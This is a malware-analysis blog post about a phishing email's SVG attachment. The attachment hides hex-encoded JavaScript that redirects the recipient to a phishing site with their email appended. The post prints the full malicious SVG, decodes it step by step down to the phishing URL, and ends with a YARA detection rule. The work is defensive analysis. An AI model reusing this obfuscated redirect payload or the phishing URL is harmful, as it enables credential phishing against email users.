Cyber

SVG with Hex-Encoded JavaScript | 03-28-2025


It's important to stay vigilant when it comes to phishing threats! The following is an analysis of a SVG attachment with hex-encoded JavaScript delivered via phishing email. By obfuscating in this manner, the attacker can bypass security filters and malware scanning tools.

// SVG Breakdown

Note: the user email has been redacted to “[email protected] 

                            
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">
<script type="application/ecmascript">
<![CDATA[
ahMzo = "[email protected]";
new Function("77696e646f772e6c6f636174696f6e2e68726566203d2061746f622860614852602b22306348222b224d364c222b60793936602b60595773602b60354c6e602b274a7562272b27485232272b22615842222b60704c6d602b60567a4c602b27325669272b27575464272b60475653602b60386a55602b22673d3d22292b61684d7a6f3b".match(/.{1,2}/g).reduce((hQIYPl,WxfbnZ)=>hQIYPl+String.fromCharCode(parseInt(WxfbnZ,16)),""))();
]]>
</script>
</svg>

The Scalable Vector Graphics (SVG) file format is XML-based, which means it can be parsed by a browser similar to HTML. By including the <script> tag, the JavaScript is executed by the browser’s JavaScript engine once the attachment is opened.


// JavaScript Breakdown

Execution Overview

                            
ahMzo = "[email protected]"; 
new Function("77696e646f772e6c6f636174696f6e2e68726566203d2061746f622860614852602b22306348222b224d364c222b60793936602b60595773602b60354c6e602b274a7562272b27485232272b22615842222b60704c6d602b60567a4c602b27325669272b27575464272b60475653602b60386a55602b22673d3d22292b61684d7a6f3b".match(/.{1,2}/g).reduce((hQIYPl,WxfbnZ)=>hQIYPl+String.fromCharCode(parseInt(WxfbnZ,16)),""))();

new Function(...) creates a function, and the (); at the end immediately calls the function (Immediately Invoked Function Expression (IIFE)).

The match() method splits the string into chunks of two characters each, representing a single hexadecimal byte.

The reduce() method iterates over the array of hexadecimal pairs.

  1. For each pair: WxfbnZ represents the current hexadecimal pair. parseInt(WxfbnZ, 16) converts the hexadecimal pair into a decimal number. String.fromCharCode(...) converts the decimal number into a character.

  2. The result is added to hQIYPl, which is the accumulator.

  3. After all iterations, reduce(...) returns the fully concatenated string.

// Static Analysis

Hexadecimal String

                            
"77696e646f772e6c6f636174696f6e2e68726566203d2061746f622860614852602b22306348222b224d364c222b60793936602b60595773602b60354c6e602b274a7562272b27485232272b22615842222b60704c6d602b60567a4c602b27325669272b27575464272b60475653602b60386a55602b22673d3d22292b61684d7a6f3b"

Split Hexadecimal String

                            
"77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 61 74 6f 62 28 60 61 48 52 60 2b 22 30 63 48 22 2b 22 4d 36 4c 22 2b 60 79 39 36 60 2b 60 59 57 73 60 2b 60 35 4c 6e 60 2b 27 4a 75 62 27 2b 27 48 52 32 27 2b 22 61 58 42 22 2b 60 70 4c 6d 60 2b 60 56 7a 4c 60 2b 27 32 56 69 27 2b 27 57 54 64 27 2b 60 47 56 53 60 2b 60 38 6a 55 60 2b 22 67 3d 3d 22 29 2b 61 68 4d 7a 6f 3b"

Hexadecimal to Decimal

( This step is technically redundant as one could go from hex to ASCII, but it was kept to stay consistent with the execution flow ) 

                            
"119 105 110 100 111 119 46 108 111 99 97 116 105 111 110 46 104 114 101 102 32 61 32 97 116 111 98 40 96 97 72 82 96 43 34 48 99 72 34 43 34 77 54 76 34 43 96 121 57 54 96 43 96 89 87 115 96 43 96 53 76 110 96 43 39 74 117 98 39 43 39 72 82 50 39 43 34 97 88 66 34 43 96 112 76 109 96 43 96 86 122 76 96 43 39 50 86 105 39 43 39 87 84 100 39 43 96 71 86 83 96 43 96 56 106 85 96 43 34 103 61 61 34 41 43 97 104 77 122 111 59"

Decimal to ASCII

                            
window.location.href = atob(aHR+0cH+M6L+y96+YWs+5Ln+Jub+HR2+aXB+pLm+VzL+2Vi+WTd+GVS+8jU+g==) + ahMzo;

Concatenate Base64 String 

                            
window.location.href = atob(aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8jUg==)+ahMzo

Decode Base64 String 

                            
window.location.href = (https://zak9.rnltvipi.es/ebY7FV/#R)+ahMzo

Final URL

                            
window.location.href = https://zak9.rnltvipi.es/ebY7FV/#[email protected]

// YARA Rule

Although a bit specific to this implementation in particular, I took the opportunity to practice creating YARA rules by writing one to detect similar threats. 

                            
rule SUSP_SVG_JS_Hex_Encoded {
    meta:
        description = "Detects malicious SVGs with hex-encoded JavaScript obfuscation"
        author = "Nicholas Hooper (https://github.com/hoop3r)"
        date = "2025-03-26"
        reference = "Internal Research"
        score = 60

    strings:
        $svg_tag = "<svg xmlns=" ascii fullword
        $script_tag = "<script>"

        $hex_decode1 = "match(/.{1,2}/g).reduce(("
        $hex_decode2 = "String.fromCharCode(parseInt("
        $IIFE= ")();"

    condition:
        filesize < 100KB and 
        $svg_tag in (0..1024) and
        $script_tag in (0..1024) and
        $hex_decode1 and 
        $hex_decode2 and 
        $IIFE
}